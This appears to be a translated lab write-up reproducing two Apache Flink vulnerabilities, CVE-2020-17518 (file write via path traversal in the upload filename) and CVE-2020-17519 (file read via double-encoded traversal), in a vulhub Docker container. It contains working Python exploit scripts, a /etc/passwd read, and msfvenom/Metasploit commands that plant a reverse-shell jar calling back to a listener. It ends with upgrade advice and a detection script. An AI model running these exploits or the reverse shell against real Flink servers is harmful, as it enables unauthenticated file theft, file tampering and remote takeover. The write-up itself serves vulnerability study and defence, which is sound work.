Introduction
Apache Flink is a distributed, general-purpose data processing platform: an open source stream processing framework developed by the Apache Software Foundation. Its core is a distributed streaming dataflow engine written in Java and Scala (in short, it is comparable to Spark). Flink has a monitoring API that can be used to query the status and statistics of running jobs and recently completed jobs. The same API backs Flink's own web dashboard and can also be used to build custom monitoring tools. By default it listens on port 8081.
The monitoring API is a RESTful API: it accepts HTTP requests and responds with JSON.
One of its endpoints is /jars/upload, which uploads a jar to the cluster. The jar must be sent as multipart form data in a field named jarfile. Make sure the part's Content-Type header is set to application/x-java-archive, because some HTTP libraries do not add it by default. A jar can be uploaded with curl:
curl -X POST -H "Expect:" -F "jarfile=@path/to/flink-job.jar" http://hostname:port/jars/upload
Overview
The REST upload handler added in Flink 1.5.1 and the REST changes made in 1.11.0 were implemented without adequate path validation, resulting in an arbitrary file read (CVE-2020-17519) and an arbitrary file write (CVE-2020-17518).
CVE-2020-17518: an attacker can modify a header of the multipart upload request sent to the REST API and have the uploaded file written to any location on the local file system that the Flink process can write to.
CVE-2020-17519: Apache Flink 1.11.0 allows an attacker to read any file on the JobManager's local file system that the JobManager process can access, through the REST interface of the JobManager process.
Affected versions
CVE-2020-17518
Apache Flink 1.5.1 to 1.11.2
CVE-2020-17519
Apache Flink 1.11.0, 1.11.1, 1.11.2
Environment setup
Because 1.11.2 is affected by both vulnerabilities, that version is used for the reproduction.
The vulhub environment is used here. Create a new docker-compose.yml:
version: '2'
services:
  hefty:
    image: vulhub/flink:1.11.2
    command: jobmanager
    ports:
      - "8081:8081"
      - "6123:6123"
Start the environment with docker-compose. The following command downloads the image and starts a container from it, mapping ports 8081 and 6123 to the host:
docker-compose up -d
Then open http://ip:8081 in a browser.
Vulnerability reproduction
Arbitrary file write (CVE-2020-17518):
Apache Flink 1.5.1 introduced a REST handler that allows an uploaded file to be written to any location on the local file system through a maliciously modified HTTP header.
Open http://ip:8081, go to Submit New Job and click Add New to upload a jar package. For this test any file will do: create a zip archive, rename its .zip extension to .jar, and capture the upload request with an intercepting proxy such as Burp Suite.
The captured request is as follows:
Send the request to the Repeater module and modify the filename in the Content-Disposition header of the jarfile part. Here I create a new file in the /tmp directory. Prefixing the filename with several ../ segments walks up the directory tree; since the upload handler's current directory is unknown, enough ../ segments reach the root directory from anywhere, and the rest of the path is then absolute in effect.
Check whether the file was written:
docker ps lists the running containers
Enter the container:
docker exec -it CONTAINER_ID /bin/bash
The file is present in /tmp, so the write succeeded. Note that the HTTP response alone does not prove the write; verify on the file system.
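The crafted upload from the steps above, written as an added example rather than code from the original post or from the Flink project. It builds the multipart request for /jars/upload with the part's filename set to a traversal path, which the vulnerable 1.5.1 to 1.11.2 handler joins onto its upload directory without normalising. The target 127.0.0.1:8081 (the vulhub container), the destination /tmp/success and the traversal depth of six are assumptions for this example.

```python
"""Added example (not from the original post or the Flink project).

Builds and sends the CVE-2020-17518 multipart upload.  Host, port, the
destination path /tmp/success and the traversal depth are assumptions.
"""
import http.client
import re

BOUNDARY = "8ae3b0c9e7d44ac6"  # arbitrary boundary string chosen for this example


def traversal_filename(target_path: str, depth: int = 6) -> str:
    """Turn an absolute target path into '../../../../../../tmp/success'."""
    return "../" * depth + target_path.lstrip("/")


def build_traversal_upload(filename: str, content: bytes, boundary: str = BOUNDARY) -> tuple:
    """Return (headers, body) for a multipart/form-data POST to /jars/upload.

    'jarfile' is the field name the Flink upload handler expects.  The
    vulnerable handler resolves the client-supplied filename against its
    upload directory, so '../' segments in it escape that directory.
    """
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="jarfile"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode() + content + f"\r\n--{boundary}--\r\n".encode()
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    }
    return headers, body


def part_filename(body: bytes) -> str:
    """Extract the filename the server will see from a built body (for checking)."""
    m = re.search(rb'filename="([^"]*)"', body)
    return m.group(1).decode() if m else ""


def send_upload(host: str, port: int, filename: str, content: bytes) -> int:
    """POST the crafted request and return the HTTP status code.

    The status does not confirm the write; check the target file system,
    as the post does with docker exec.
    """
    headers, body = build_traversal_upload(filename, content)
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("POST", "/jars/upload", body=body, headers=headers)
    status = conn.getresponse().status
    conn.close()
    return status


if __name__ == "__main__":
    name = traversal_filename("/tmp/success")  # assumed destination
    print("filename sent:", name)
    print("status:", send_upload("127.0.0.1", 8081, name, b"cve-2020-17518 test\n"))
```

The same body can be pasted into Burp's Repeater; the only field that matters for the traversal is the filename parameter of the Content-Disposition header.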
Flink's REST API has no authentication by default, and it accepts and runs any uploaded jar, so uploading a malicious jar gives a shell directly.
Generate a reverse-shell payload in jar format:
lhost is the IP of the Kali machine, lport is the port on which Kali receives the shell.
msfvenom -p java/shell_reverse_tcp lhost=192.168.74.142 lport=1234 -f jar >/home/a.jar
Start a Metasploit handler to receive the shell:
msfconsole
use exploit/multi/handler
set payload java/shell_reverse_tcp
set LHOST 192.168.74.142
set LPORT 1234
exploit
After uploading the jar package, click it in the list and then Submit. Flink runs the jar and the handler receives a shell.
Arbitrary file read (CVE-2020-17519):
The changes introduced in Apache Flink 1.11.0 (and also released in 1.11.1 and 1.11.2) allow an attacker to read any file on the JobManager's local file system through the REST interface of the JobManager process. Access is limited to files the JobManager process can read.
For example, here I read /etc/passwd. %252f is / URL-encoded twice (/ becomes %2f, and %2f becomes %252f); it replaces every / in the ../ sequence so that the traversal is carried inside a single path segment and only becomes ../ after the handler decodes it again.
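The read above as an added example (not code from the original post or the Flink project). It builds the publicly documented /jobmanager/logs/ traversal path with the double encoding the post describes, shows what the path resolves to after one and two rounds of decoding, and fetches the file. The target 127.0.0.1:8081 and the traversal depth of five are assumptions; urllib produces uppercase %252F, which decodes identically to the %252f in the post.

```python
"""Added example (not from the original post or the Flink project).

CVE-2020-17519: read a JobManager-local file via the /jobmanager/logs/
endpoint.  Host, port and traversal depth are assumptions.
"""
import http.client
from urllib.parse import quote, unquote

LOGS_PREFIX = "/jobmanager/logs/"


def traversal_path(target_file: str, depth: int = 5) -> str:
    """Build e.g. /jobmanager/logs/..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd.

    Each '/' in the traversal is percent-encoded twice, so the whole thing
    stays one path segment while the request is routed to the log handler.
    """
    inner = "../" * depth + target_file.lstrip("/")
    once = quote(inner, safe="")     # '/' -> '%2F'
    twice = quote(once, safe="")     # '%' -> '%25', so '%2F' -> '%252F'
    return LOGS_PREFIX + twice


def resolved_segment(request_path: str) -> str:
    """What the segment becomes after the two decodes the vulnerable path goes through."""
    return unquote(unquote(request_path[len(LOGS_PREFIX):]))


def read_remote_file(host: str, port: int, target_file: str) -> tuple:
    """GET the traversal path; return (status, body text)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("GET", traversal_path(target_file))
    resp = conn.getresponse()
    text = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, text


def looks_like_passwd(text: str) -> bool:
    """Cheap sanity check that the body really is /etc/passwd (root line, 7 fields)."""
    return any(line.startswith("root:") and line.count(":") == 6
               for line in text.splitlines())


if __name__ == "__main__":
    path = traversal_path("/etc/passwd")
    print("request path :", path)
    print("after 1 decode:", unquote(path))
    print("after 2 decode:", LOGS_PREFIX + resolved_segment(path))
    status, body = read_remote_file("127.0.0.1", 8081, "/etc/passwd")  # assumed target
    print("status:", status, "passwd-like:", looks_like_passwd(body))
```

Running it against the vulhub container returns the passwd file; against a patched 1.11.3 or 1.12.0 JobManager the same request is rejected.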
Fix
Fixed versions have been released: both vulnerabilities are resolved in Apache Flink 1.11.3 and 1.12.0, so upgrade to one of those or later. Because the REST API has no authentication by default, the JobManager's port 8081 should in any case not be reachable from untrusted networks, whatever the version.
https://flink.apache.org/zh/downloads.html
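Until the upgrade is done, the two request shapes used in this article are easy to spot in front of port 8081. The following is an added example, not part of the original post: a check that a reverse proxy or log pipeline could run over raw requests, flagging a /jobmanager/logs/ segment that still contains .. or a separator after two rounds of decoding (CVE-2020-17519) and a /jars/upload part whose filename contains .. or a separator (CVE-2020-17518). The sample requests are constructed for this example.

```python
"""Added example (not from the original post): detection for the two request
shapes above.  The SAMPLES dict is constructed input, not captured traffic."""
import re
from urllib.parse import unquote

LOGS_PREFIX = "/jobmanager/logs/"
FILENAME_RE = re.compile(rb'Content-Disposition:[^\r\n]*filename="([^"]*)"', re.IGNORECASE)


def suspicious_log_path(path: str) -> bool:
    """True if the logs segment escapes the log directory after double decoding."""
    if not path.startswith(LOGS_PREFIX):
        return False
    segment = path[len(LOGS_PREFIX):].split("?", 1)[0]
    decoded = unquote(unquote(segment))  # decode twice, as the vulnerable handler effectively does
    return ".." in decoded or "/" in decoded or "\\" in decoded


def suspicious_upload_filenames(raw: bytes) -> list:
    """Filenames of multipart parts that contain '..' or a path separator."""
    names = [m.decode(errors="replace") for m in FILENAME_RE.findall(raw)]
    return [n for n in names if ".." in n or "/" in n or "\\" in n]


def inspect_request(raw: bytes) -> list:
    """Return findings for one raw HTTP request; an empty list means clean."""
    request_line = raw.split(b"\r\n", 1)[0].decode(errors="replace")
    parts = request_line.split(" ")
    if len(parts) < 2:
        return ["malformed request line"]
    method, path = parts[0], parts[1]
    findings = []
    if suspicious_log_path(path):
        findings.append(f"CVE-2020-17519 traversal in path: {path}")
    if method == "POST" and path.startswith("/jars/upload"):
        for name in suspicious_upload_filenames(raw):
            findings.append(f"CVE-2020-17518 traversal in upload filename: {name}")
    return findings


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "normal_log": b"GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1\r\nHost: flink\r\n\r\n",
    "read_passwd": (b"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1\r\n"
                    b"Host: flink\r\n\r\n"),
    "normal_upload": (b"POST /jars/upload HTTP/1.1\r\nHost: flink\r\n"
                      b"Content-Type: multipart/form-data; boundary=x\r\n\r\n"
                      b'--x\r\nContent-Disposition: form-data; name="jarfile"; filename="job.jar"\r\n\r\n'
                      b"PK\r\n--x--\r\n"),
    "write_tmp": (b"POST /jars/upload HTTP/1.1\r\nHost: flink\r\n"
                  b"Content-Type: multipart/form-data; boundary=x\r\n\r\n"
                  b'--x\r\nContent-Disposition: form-data; name="jarfile"; '
                  b'filename="../../../../../../tmp/success"\r\n\r\nhi\r\n--x--\r\n'),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:14s}", inspect_request(raw) or "clean")
```

The .. check is deliberately broad: a legitimate log name containing two consecutive dots would also be flagged, which is the right trade-off for an endpoint that should only ever name files inside the log directory.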
Reference link